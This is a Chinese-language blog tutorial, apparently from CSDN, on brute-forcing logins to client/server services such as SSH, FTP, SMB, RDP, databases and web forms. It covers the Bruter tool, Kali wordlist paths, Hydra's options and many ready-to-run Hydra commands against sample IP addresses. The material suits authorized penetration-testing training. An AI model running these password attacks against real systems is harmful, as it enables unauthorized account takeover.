暴力破解与验证码安全之——CS架暴力猜解

CS架暴力猜解

指软件,数据库,操作系统,3389相关的破解。C/S 即客户端/服务器,基于 C/S 架构的应用程序 如 ssh ftp
sql-server mysql 等,这些服务往往提供一个高权限的用户,而这个高权限的用户往往可以进行执行命令的操作,如sql-server 的 sa ,mysql 的 root,oracle 的 sys 和 system帐号,使用这些高权限的用户能在很大程度上给开发人员带来方便,但如果口令被破解带来的危害也是相当大的。C/S 架构主要使用的破解工具 Hydra、Bruter、X-scan

window下建议使用bruter

添加地址,选择协议(目标Linux选SSH2,windows用SMB,数据库MYSQL,邮箱POP3),端口(小技巧:Linux默认22,不知道就利用nmap扫一下,telnet+Ip+端口,看一下哪个用的是SSH2

linux默认用户名一般是root,windows是administrator
选择字典(注意不支持中文目录)
开始
也可以用自带功能
设置密码长度

Linux下建议使用hydra

kali自带
也可以自己下载安装
注意hydra-gtk是图形化界面的
hydra 是著名黑客组织 thc 的一款开源的暴力密码破解工具,可以在线破解多种密码。官网:http://www.thc.org/thc-hydra

kail 密码字典

/usr/share/wfuzz/wordlist/others/names.txt
/usr/share/wfuzz/wordlist/others/common_pass.txt
在该界面指定用户名和密码列表文件,这里使用 Kali 系统中存在的用户名和
密码列表文件,并选择 Loop around users 选项。其中,用户名和密码文件
分别保存在/usr/share/wfuzz/wordlist/others/names.txt 和
/usr/share/wfuzz/wordlist/others/common_pass.txt 中

参数

		hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
		-R 继续从上一次进度接着破解。
		-S 采用 SSL 链接。
		-s PORT 可通过这个参数指定非默认端口。
		-l LOGIN 指定破解的用户名,对特定用户破解。
		-L FILE 指定用户名字典。
		-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
		-P FILE 大写,指定密码字典。
		-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
			一般都是加上的
		-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P 参数。
		-M FILE 指定目标列表文件一行一条。
		-o FILE 指定结果输出文件。
		-f 在使用-M 参数以后,找到第一对登录名或者密码的时候中止破解。
		-t TASKS 同时运行的线程数,默认为 16。 -w TIME 设置最大超时的时间,单位秒,默认是 30s。 -v / -V 显示详细过程。
		server 目标 ip
		service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt 
			http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 l
		dap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp 
		rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd fi
		rebird ncp afp 等等。
		OPT 可选项

使用举例

		1.手动创建用户名字典和密码字典,需要利用密码字典生成器生成强大的字典
		2.破解 ssh:

#hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.8 ssh
破解成功,直接显示结果。也可以使用 -o 选项指定结果输出文件。

#hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh

		1.破解 ssh:
			# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
				# hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
		2.破解 ftp:
			# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认 16) -vV
				# hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
		3.get 方式提交,破解 web 登录:
			# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
				# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
		4.post 方式提交,破解 web 登录:
			# hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username =^USER^&password=^PASS^&submit=login:sorry password"
				# hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "log in.php:id=^USER^&passwd=^PASS^:wrong username or password"
					(参数说明:-t 同时线程数 3,-l 用户名是 admin,字典 pass.txt,保存为 out.txt,-f 当破解了一个密码就停止, 10.36.16.18 目标 ip,http-post-form 表示破解是采用 http 的 post 方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。)
		5.破解 https:
			# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
		6.破解 teamspeak:
			# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
		7.破解 cisco:
			# hydra -P pass.txt 10.36.16.18 cisco
				# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
		8.破解 smb:
			# hydra -l administrator -P pass.txt 10.36.16.18 smb
		9.破解 pop3:
			# hydra -l muts -P pass.txt my.pop3.mail pop3
		10.破解 rdp:
			# hydra ip rdp -l administrator -P pass.txt -V
		11.破解 http-proxy:
			# hydra -l admin -P pass.txt http-proxy://10.36.16.18
		12.破解 imap:
			# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN

关于hydra-gtk的使用

		图形化界面界面比较简单,直接填写IP,设置字典,设置协议等
			就可以开始了

补充

对于爆破软件的选择,主要看速度,稳定性,支持的协议数
这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,
其密码能否被破解关键在于字典是否足够强大。

发布了117 篇原创文章 · 获赞 11 · 访问量 6455

猜你喜欢

转载自blog.csdn.net/weixin_43079958/article/details/105522847